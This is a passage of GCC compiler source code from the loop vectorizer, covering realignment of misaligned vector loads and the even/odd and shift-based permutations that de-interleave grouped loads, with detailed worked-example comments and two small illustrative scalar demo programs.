detail in vect_supportable_dr_alignment). In this case, not only is the
optimized realignment scheme not applicable, but also the misalignment
computation (and generation of the realignment token that is passed to
REALIGN_LOAD) have to be done inside the loop.
In short, INIT_ADDR indicates whether we are in a COMPUTE_IN_LOOP mode
or not, which in turn determines if the misalignment is computed inside
the inner-loop, or outside LOOP. */
if (init_addr != NULL_TREE || !loop_vinfo)
{
compute_in_loop = true;
gcc_assert (alignment_support_scheme == dr_explicit_realign);
}
/* 2. Determine where to generate the extra vector load.
For the optimized realignment scheme, instead of generating two vector
loads in each iteration, we generate a single extra vector load in the
preheader of the loop, and in each iteration reuse the result of the
vector load from the previous iteration. In case the memory access is in
an inner-loop nested inside LOOP, which is now being vectorized using
outer-loop vectorization, we need to determine whether this initial vector
load should be generated at the preheader of the inner-loop, or can be
generated at the preheader of LOOP. If the memory access has no evolution
in LOOP, it can be generated in the preheader of LOOP. Otherwise, it has
to be generated inside LOOP (in the preheader of the inner-loop). */
if (nested_in_vect_loop)
{
tree outerloop_step = STMT_VINFO_DR_STEP (stmt_info);
bool invariant_in_outerloop =
(tree_int_cst_compare (outerloop_step, size_zero_node) == 0);
loop_for_initial_load = (invariant_in_outerloop ? loop : loop->inner);
}
else
loop_for_initial_load = loop;
if (at_loop)
*at_loop = loop_for_initial_load;
if (loop_for_initial_load)
pe = loop_preheader_edge (loop_for_initial_load);
/* 3. For the case of the optimized realignment, create the first vector
load at the loop preheader. */
if (alignment_support_scheme == dr_explicit_realign_optimized)
{
/* Create msq_init = *(floor(p1)) in the loop preheader */
gassign *new_stmt;
gcc_assert (!compute_in_loop);
vec_dest = vect_create_destination_var (scalar_dest, vectype);
ptr = vect_create_data_ref_ptr (stmt, vectype, loop_for_initial_load,
NULL_TREE, &init_addr, NULL, &inc,
true, &inv_p);
new_temp = copy_ssa_name (ptr);
new_stmt = gimple_build_assign
(new_temp, BIT_AND_EXPR, ptr,
build_int_cst (TREE_TYPE (ptr),
-(HOST_WIDE_INT)TYPE_ALIGN_UNIT (vectype)));
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
data_ref
= build2 (MEM_REF, TREE_TYPE (vec_dest), new_temp,
build_int_cst (reference_alias_ptr_type (DR_REF (dr)), 0));
new_stmt = gimple_build_assign (vec_dest, data_ref);
new_temp = make_ssa_name (vec_dest, new_stmt);
gimple_assign_set_lhs (new_stmt, new_temp);
if (pe)
{
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
}
else
gsi_insert_before (gsi, new_stmt, GSI_SAME_STMT);
msq_init = gimple_assign_lhs (new_stmt);
}
/* 4. Create realignment token using a target builtin, if available.
It is done either inside the containing loop, or before LOOP (as
determined above). */
if (targetm.vectorize.builtin_mask_for_load)
{
gcall *new_stmt;
tree builtin_decl;
/* Compute INIT_ADDR - the initial address accessed by this memref. */
if (!init_addr)
{
/* Generate the INIT_ADDR computation outside LOOP. */
init_addr = vect_create_addr_base_for_vector_ref (stmt, &stmts,
NULL_TREE, loop);
if (loop)
{
pe = loop_preheader_edge (loop);
new_bb = gsi_insert_seq_on_edge_immediate (pe, stmts);
gcc_assert (!new_bb);
}
else
gsi_insert_seq_before (gsi, stmts, GSI_SAME_STMT);
}
builtin_decl = targetm.vectorize.builtin_mask_for_load ();
new_stmt = gimple_build_call (builtin_decl, 1, init_addr);
vec_dest =
vect_create_destination_var (scalar_dest,
gimple_call_return_type (new_stmt));
new_temp = make_ssa_name (vec_dest, new_stmt);
gimple_call_set_lhs (new_stmt, new_temp);
if (compute_in_loop)
gsi_insert_before (gsi, new_stmt, GSI_SAME_STMT);
else
{
/* Generate the misalignment computation outside LOOP. */
pe = loop_preheader_edge (loop);
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
}
*realignment_token = gimple_call_lhs (new_stmt);
/* The result of the CALL_EXPR to this builtin is determined from
the value of the parameter and no global variables are touched
which makes the builtin a "const" function. Requiring the
builtin to have the "const" attribute makes it unnecessary
to call mark_call_clobbered. */
gcc_assert (TREE_READONLY (builtin_decl));
}
if (alignment_support_scheme == dr_explicit_realign)
return msq;
gcc_assert (!compute_in_loop);
gcc_assert (alignment_support_scheme == dr_explicit_realign_optimized);
/* 5. Create msq = phi <msq_init, lsq> in loop */
pe = loop_preheader_edge (containing_loop);
vec_dest = vect_create_destination_var (scalar_dest, vectype);
msq = make_ssa_name (vec_dest);
phi_stmt = create_phi_node (msq, containing_loop->header);
add_phi_arg (phi_stmt, msq_init, pe, UNKNOWN_LOCATION);
return msq;
}
/* Function vect_grouped_load_supported.
Returns TRUE if even and odd permutations are supported,
and FALSE otherwise. */
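/* For example (illustrative): with nelt == 4 the masks checked below
are the extract-even mask {0, 2, 4, 6} and the extract-odd mask
{1, 3, 5, 7}, selecting alternating elements from the concatenation
of two input vectors. */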
bool
vect_grouped_load_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode = TYPE_MODE (vectype);
/* vect_permute_load_chain requires the group size to be equal to 3 or
be a power of two. */
if (count != 3 && exact_log2 (count) == -1)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"the size of the group of accesses"
" is not a power of 2 or not equal to 3\n");
return false;
}
/* Check that the permutation is supported. */
if (VECTOR_MODE_P (mode))
{
unsigned int i, j, nelt = GET_MODE_NUNITS (mode);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
if (count == 3)
{
unsigned int k;
for (k = 0; k < 3; k++)
{
for (i = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = 3 * i + k;
else
sel[i] = 0;
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 loads is not supported by"
" target\n");
return false;
}
for (i = 0, j = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = i;
else
sel[i] = nelt + ((nelt + k) % 3) + 3 * (j++);
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 loads is not supported by"
" target\n");
return false;
}
}
return true;
}
else
{
/* If length is not equal to 3 then only a power of 2 is supported. */
gcc_assert (exact_log2 (count) != -1);
for (i = 0; i < nelt; i++)
sel[i] = i * 2;
if (can_vec_perm_p (mode, false, sel))
{
for (i = 0; i < nelt; i++)
sel[i] = i * 2 + 1;
if (can_vec_perm_p (mode, false, sel))
return true;
}
}
}
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"extract even/odd not supported by target\n");
return false;
}
/* Return TRUE if vec_load_lanes is available for COUNT vectors of
type VECTYPE. */
bool
vect_load_lanes_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
return vect_lanes_optab_supported_p ("vec_load_lanes",
vec_load_lanes_optab,
vectype, count);
}
/* Function vect_permute_load_chain.
Given a chain of interleaved loads in DR_CHAIN of LENGTH that must be
a power of 2 or equal to 3, generate extract_even/odd stmts to reorder
the input data correctly. Return the final references for loads in
RESULT_CHAIN.
E.g., LENGTH is 4 and the scalar type is short, i.e., VF is 8.
The input is 4 vectors each containing 8 elements. We assign a number to each
element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
4th vec: 24 25 26 27 28 29 30 31
The output sequence should be:
1st vec: 0 4 8 12 16 20 24 28
2nd vec: 1 5 9 13 17 21 25 29
3rd vec: 2 6 10 14 18 22 26 30
4th vec: 3 7 11 15 19 23 27 31
i.e., the first output vector should contain the first elements of each
interleaving group, etc.
We use extract_even/odd instructions to create such output. The input of
each extract_even/odd operation is two vectors
1st vec 2nd vec
0 1 2 3 4 5 6 7
and the output is the vector of extracted even/odd elements. The output of
extract_even will be: 0 2 4 6
and of extract_odd: 1 3 5 7
The permutation is done in log LENGTH stages. In each stage extract_even
and extract_odd stmts are created for each pair of vectors in DR_CHAIN in
their order. In our example,
E1: extract_even (1st vec, 2nd vec)
E2: extract_odd (1st vec, 2nd vec)
E3: extract_even (3rd vec, 4th vec)
E4: extract_odd (3rd vec, 4th vec)
The output for the first stage will be:
E1: 0 2 4 6 8 10 12 14
E2: 1 3 5 7 9 11 13 15
E3: 16 18 20 22 24 26 28 30
E4: 17 19 21 23 25 27 29 31
In order to proceed and create the correct sequence for the next stage (or
for the correct output, if the second stage is the last one, as in our
example), we first put the output of extract_even operation and then the
output of extract_odd in RESULT_CHAIN (which is then copied to DR_CHAIN).
The input for the second stage is:
1st vec (E1): 0 2 4 6 8 10 12 14
2nd vec (E3): 16 18 20 22 24 26 28 30
3rd vec (E2): 1 3 5 7 9 11 13 15
4th vec (E4): 17 19 21 23 25 27 29 31
The output of the second stage:
E1: 0 4 8 12 16 20 24 28
E2: 2 6 10 14 18 22 26 30
E3: 1 5 9 13 17 21 25 29
E4: 3 7 11 15 19 23 27 31
And RESULT_CHAIN after reordering:
1st vec (E1): 0 4 8 12 16 20 24 28
2nd vec (E3): 1 5 9 13 17 21 25 29
3rd vec (E2): 2 6 10 14 18 22 26 30
4th vec (E4): 3 7 11 15 19 23 27 31. */
static void
vect_permute_load_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree data_ref, first_vect, second_vect;
tree perm_mask_even, perm_mask_odd;
tree perm3_mask_low, perm3_mask_high;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
unsigned int i, j, log_length = exact_log2 (length);
unsigned nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (length == 3)
{
unsigned int k;
for (k = 0; k < 3; k++)
{
for (i = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = 3 * i + k;
else
sel[i] = 0;
perm3_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0, j = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = i;
else
sel[i] = nelt + ((nelt + k) % 3) + 3 * (j++);
perm3_mask_high = vect_gen_perm_mask_checked (vectype, sel);
first_vect = dr_chain[0];
second_vect = dr_chain[1];
/* Create interleaving stmt (low part of the shuffle):
low = VEC_PERM_EXPR <first_vect, second_vect, {k, 3 + k, 6 + k,
...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_low");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, first_vect,
second_vect, perm3_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
/* Create interleaving stmt (high part of the shuffle), combining the
low result with the third vector:
high = VEC_PERM_EXPR <low, third_vect, perm3_mask_high> */
first_vect = data_ref;
second_vect = dr_chain[2];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_high");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, first_vect,
second_vect, perm3_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[k] = data_ref;
}
}
else
{
/* If length is not equal to 3, then only a power of 2 is supported. */
gcc_assert (exact_log2 (length) != -1);
for (i = 0; i < nelt; ++i)
sel[i] = i * 2;
perm_mask_even = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; ++i)
sel[i] = i * 2 + 1;
perm_mask_odd = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < log_length; i++)
{
for (j = 0; j < length; j += 2)
{
first_vect = dr_chain[j];
second_vect = dr_chain[j+1];
/* data_ref = permute_even (first_data_ref, second_data_ref); */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_perm_even");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, second_vect,
perm_mask_even);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2] = data_ref;
/* data_ref = permute_odd (first_data_ref, second_data_ref); */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_perm_odd");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, second_vect,
perm_mask_odd);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2+length/2] = data_ref;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
}
}
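/* An illustrative scalar model of the extract_even/odd algorithm above
(added for exposition; it is independent of the GCC internals). Each
"vector" is an array of NELT ints, and VEC_PERM_EXPR with the even (odd)
mask is modeled by taking the even (odd) elements of the concatenation of
two vectors. Running it reproduces the worked example: inputs 0..31 in 4
vectors come out strided by 4. */
#ifdef VECT_PERMUTE_LOAD_CHAIN_DEMO
#include <stdio.h>
#include <string.h>
#define NELT 8
#define LENGTH 4
static void
extract_even (const int *a, const int *b, int *out)
{
for (int i = 0; i < NELT; i++)
out[i] = (i < NELT / 2) ? a[2 * i] : b[2 * i - NELT];
}
static void
extract_odd (const int *a, const int *b, int *out)
{
for (int i = 0; i < NELT; i++)
out[i] = (i < NELT / 2) ? a[2 * i + 1] : b[2 * i + 1 - NELT];
}
int
main (void)
{
int chain[LENGTH][NELT], result[LENGTH][NELT];
for (int v = 0; v < LENGTH; v++)
for (int i = 0; i < NELT; i++)
chain[v][i] = v * NELT + i;
/* log2 (LENGTH) == 2 stages, as in vect_permute_load_chain.  */
for (int stage = 0; stage < 2; stage++)
{
for (int j = 0; j < LENGTH; j += 2)
{
extract_even (chain[j], chain[j + 1], result[j / 2]);
extract_odd (chain[j], chain[j + 1], result[j / 2 + LENGTH / 2]);
}
memcpy (chain, result, sizeof (chain));
}
for (int v = 0; v < LENGTH; v++)
{
for (int i = 0; i < NELT; i++)
printf (" %2d", chain[v][i]);
printf ("\n"); /* 0 4 8 ... / 1 5 9 ... / 2 6 10 ... / 3 7 11 ...  */
}
return 0;
}
#endif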
/* Function vect_shift_permute_load_chain.
Given a chain of loads in DR_CHAIN of LENGTH 2 or 3, generate
sequence of stmts to reorder the input data accordingly.
Return the final references for loads in RESULT_CHAIN.
Return true if successful, false otherwise.
E.g., LENGTH is 3 and the scalar type is short, i.e., VF is 8.
The input is 3 vectors each containing 8 elements. We assign a
number to each element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
The output sequence should be:
1st vec: 0 3 6 9 12 15 18 21
2nd vec: 1 4 7 10 13 16 19 22
3rd vec: 2 5 8 11 14 17 20 23
We use 3 shuffle instructions and 3 * 3 - 1 shifts to create such output.
First we shuffle all 3 vectors to get correct elements order:
1st vec: ( 0 3 6) ( 1 4 7) ( 2 5)
2nd vec: ( 8 11 14) ( 9 12 15) (10 13)
3rd vec: (16 19 22) (17 20 23) (18 21)
Next we unite and shift vector 3 times:
1st step:
shift right by 6 the concatenation of:
"1st vec" and "2nd vec"
( 0 3 6) ( 1 4 7) |( 2 5) _ ( 8 11 14) ( 9 12 15)| (10 13)
"2nd vec" and "3rd vec"
( 8 11 14) ( 9 12 15) |(10 13) _ (16 19 22) (17 20 23)| (18 21)
"3rd vec" and "1st vec"
(16 19 22) (17 20 23) |(18 21) _ ( 0 3 6) ( 1 4 7)| ( 2 5)
| New vectors |
So that now new vectors are:
1st vec: ( 2 5) ( 8 11 14) ( 9 12 15)
2nd vec: (10 13) (16 19 22) (17 20 23)
3rd vec: (18 21) ( 0 3 6) ( 1 4 7)
2nd step:
shift right by 5 the concatenation of:
"1st vec" and "3rd vec"
( 2 5) ( 8 11 14) |( 9 12 15) _ (18 21) ( 0 3 6)| ( 1 4 7)
"2nd vec" and "1st vec"
(10 13) (16 19 22) |(17 20 23) _ ( 2 5) ( 8 11 14)| ( 9 12 15)
"3rd vec" and "2nd vec"
(18 21) ( 0 3 6) |( 1 4 7) _ (10 13) (16 19 22)| (17 20 23)
| New vectors |
So that now new vectors are:
1st vec: ( 9 12 15) (18 21) ( 0 3 6)
2nd vec: (17 20 23) ( 2 5) ( 8 11 14)
3rd vec: ( 1 4 7) (10 13) (16 19 22) READY
3rd step:
shift right by 5 the concatenation of:
"1st vec" and "1st vec"
( 9 12 15) (18 21) |( 0 3 6) _ ( 9 12 15) (18 21)| ( 0 3 6)
shift right by 3 the concatenation of:
"2nd vec" and "2nd vec"
(17 20 23) |( 2 5) ( 8 11 14) _ (17 20 23)| ( 2 5) ( 8 11 14)
| New vectors |
So that now all vectors are READY:
1st vec: ( 0 3 6) ( 9 12 15) (18 21)
2nd vec: ( 2 5) ( 8 11 14) (17 20 23)
3rd vec: ( 1 4 7) (10 13) (16 19 22)
This algorithm is faster than the one in vect_permute_load_chain if:
1. "shift of a concatenation" is faster than a general permutation.
This is usually so.
2. The TARGET machine can't execute vector instructions in parallel.
This is because each step of the algorithm depends on previous.
The algorithm in vect_permute_load_chain is much more parallel.
The algorithm is applicable only for LOAD CHAIN LENGTH less than VF.
*/
static bool
vect_shift_permute_load_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree vect[3], vect_shift[3], data_ref, first_vect, second_vect;
tree perm2_mask1, perm2_mask2, perm3_mask;
tree select_mask, shift1_mask, shift2_mask, shift3_mask, shift4_mask;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
unsigned int i;
unsigned nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (exact_log2 (length) != -1 && LOOP_VINFO_VECT_FACTOR (loop_vinfo) > 4)
{
unsigned int j, log_length = exact_log2 (length);
for (i = 0; i < nelt / 2; ++i)
sel[i] = i * 2;
for (i = 0; i < nelt / 2; ++i)
sel[nelt / 2 + i] = i * 2 + 1;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 2 fields structure is not \
supported by target\n");
return false;
}
perm2_mask1 = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt / 2; ++i)
sel[i] = i * 2 + 1;
for (i = 0; i < nelt / 2; ++i)
sel[nelt / 2 + i] = i * 2;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 2 fields structure is not \
supported by target\n");
return false;
}
perm2_mask2 = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {4 5 6 7 8 9 10 11}. */
for (i = 0; i < nelt; i++)
sel[i] = nelt / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift1_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to select a vector from two.
For vector length 8 it is {0 1 2 3 12 13 14 15}. */
for (i = 0; i < nelt / 2; i++)
sel[i] = i;
for (i = nelt / 2; i < nelt; i++)
sel[i] = nelt + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"select is not supported by target\n");
return false;
}
select_mask = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < log_length; i++)
{
for (j = 0; j < length; j += 2)
{
first_vect = dr_chain[j];
second_vect = dr_chain[j + 1];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, first_vect,
perm2_mask1);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[0] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
second_vect, second_vect,
perm2_mask2);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[1] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[0], vect[1], shift1_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2 + length/2] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_select");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[0], vect[1], select_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2] = data_ref;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
return true;
}
if (length == 3 && LOOP_VINFO_VECT_FACTOR (loop_vinfo) > 2)
{
unsigned int k = 0, l = 0;
/* Generating permutation constant to get all elements in the right order.
For vector length 8 it is {0 3 6 1 4 7 2 5}. */
for (i = 0; i < nelt; i++)
{
if (3 * k + (l % 3) >= nelt)
{
k = 0;
l += (3 - (nelt % 3));
}
sel[i] = 3 * k + (l % 3);
k++;
}
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 fields structure is not \
supported by target\n");
return false;
}
perm3_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {6 7 8 9 10 11 12 13}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + (nelt % 3) + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift1_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {5 6 7 8 9 10 11 12}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + 1 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift2_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {3 4 5 6 7 8 9 10}. */
for (i = 0; i < nelt; i++)
sel[i] = (nelt / 3) + (nelt % 3) / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift3_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {5 6 7 8 9 10 11 12}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + (nelt % 3) / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift4_mask = vect_gen_perm_mask_checked (vectype, sel);
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
dr_chain[k], dr_chain[k],
perm3_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[k] = data_ref;
}
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift1");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[k % 3], vect[(k + 1) % 3],
shift1_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect_shift[k] = data_ref;
}
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect_shift[(4 - k) % 3],
vect_shift[(3 - k) % 3],
shift2_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[k] = data_ref;
}
(*result_chain)[3 - (nelt % 3)] = vect[2];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift3");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect[0],
vect[0], shift3_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[nelt % 3] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift4");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect[1],
vect[1], shift4_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[0] = data_ref;
return true;
}
return false;
}
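/* An illustrative scalar model of the "shift of a concatenation" used
above (added for exposition). A two-vector VEC_PERM_EXPR whose mask is
the consecutive run {S, S + 1, ..., S + NELT - 1} just selects a window
of the concatenation; on targets with PALIGNR-style instructions this is
cheaper than a general permutation, which is condition 1 in the comment
above. */
#ifdef VECT_SHIFT_PERM_DEMO
#include <stdio.h>
#define NELT 8
static void
shift_concat (const int *a, const int *b, int s, int *out)
{
for (int i = 0; i < NELT; i++)
out[i] = (s + i < NELT) ? a[s + i] : b[s + i - NELT];
}
int
main (void)
{
int a[NELT] = {0, 1, 2, 3, 4, 5, 6, 7};
int b[NELT] = {8, 9, 10, 11, 12, 13, 14, 15};
int out[NELT];
shift_concat (a, b, 6, out); /* the "shift right by 6" step */
for (int i = 0; i < NELT; i++)
printf ("%d ", out[i]); /* prints: 6 7 8 9 10 11 12 13 */
printf ("\n");
return 0;
}
#endif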
/* Function vect_transform_grouped_load.
Given a chain of input interleaved data-refs (in DR_CHAIN), build statements
to perform their permutation, and record the resulting vectorized statements
on the associated scalar statements.
*/
void
vect_transform_grouped_load (gimple stmt, vec<tree> dr_chain, int size,
gimple_stmt_iterator *gsi)
{
machine_mode mode;
vec<tree> result_chain = vNULL;
/* DR_CHAIN contains input data-refs that are a part of the interleaving.
RESULT_CHAIN is the output of vect_permute_load_chain, it contains permuted
vectors, that are ready for vector computation. */
result_chain.create (size);
/* If the reassociation width for the vector type is 2 or greater, the
target machine can execute 2 or more vector instructions in parallel;
otherwise try to get the chain for the load group using
vect_shift_permute_load_chain. */
mode = TYPE_MODE (STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt)));
if (targetm.sched.reassociation_width (VEC_PERM_EXPR, mode) > 1
|| exact_log2 (size) != -1
|| !vect_shift_permute_load_chain (dr_chain, size, stmt,
gsi, &result_chain))
vect_permute_load_chain (dr_chain, size, stmt, gsi, &result_chain);
vect_record_grouped_load_vectors (stmt, result_chain);
result_chain.release ();
}
/* RESULT_CHAIN contains the output of a group of grouped loads that were
generated as part of the vectorization of STMT. Assign the statement
for each vector to the associated scalar statement. */
void
vect_record_grouped_load_vectors (gimple stmt, vec<tree> result_chain)
{
gimple first_stmt = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt));
gimple next_stmt, new_stmt;
unsigned int i, gap_count;
tree tmp_data_ref;
/* Put a permuted data-ref in the VECTORIZED_STMT field.
Since we scan the chain starting from its first node, their order
corresponds to the order of data-refs in RESULT_CHAIN. */
next_stmt = first_stmt;
gap_count = 1;
FOR_EACH_VEC_ELT (result_chain, i, tmp_data_ref)
{
if (!next_stmt)
break;
/* Skip the gaps. Loads created for the gaps will be removed by dead
code elimination pass later. No need to check for the first stmt in
the group, since it always exists.
GROUP_GAP is the number of steps in elements from the previous
access (if there is no gap GROUP_GAP is 1). We skip loads that
correspond to the gaps. */
if (next_stmt != first_stmt
&& gap_count < GROUP_GAP (vinfo_for_stmt (next_stmt)))
{
gap_count++;
continue;
}
while (next_stmt)
{
new_stmt = SSA_NAME_DEF_STMT (tmp_data_ref);
/* We assume that if VEC_STMT is not NULL, this is a case of multiple
copies, and we put the new vector statement in the first available
RELATED_STMT. */
if (!STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt)))
STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt)) = new_stmt;
else
{
if (!GROUP_SAME_DR_STMT (vinfo_for_stmt (next_stmt)))
{
gimple prev_stmt =
STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt));
gimple rel_stmt =
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (prev_stmt));
while (rel_stmt)
{
prev_stmt = rel_stmt;
rel_stmt =
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (rel_stmt));
}
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (prev_stmt)) =
new_stmt;
}
}
next_stmt = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next_stmt));
gap_count = 1;
/* If NEXT_STMT accesses the same DR as the previous statement,
put the same TMP_DATA_REF as its vectorized statement; otherwise
get the next data-ref from RESULT_CHAIN. */
if (!next_stmt || !GROUP_SAME_DR_STMT (vinfo_for_stmt (next_stmt)))
break;
}
}
}
/* Function vect_can_force_dr_alignment_p.
Returns whether the alignment of DECL can be forced to be aligned
on an ALIGNMENT-bit boundary. */
bool
vect_can_force_dr_alignment_p (const_tree decl, unsigned int alignment)
{
if (TREE_CODE (decl) != VAR_DECL)
return false;
if (decl_in_symtab_p (decl)
&& !symtab_node::get (decl)->can_increase_alignment_p ())
return false;
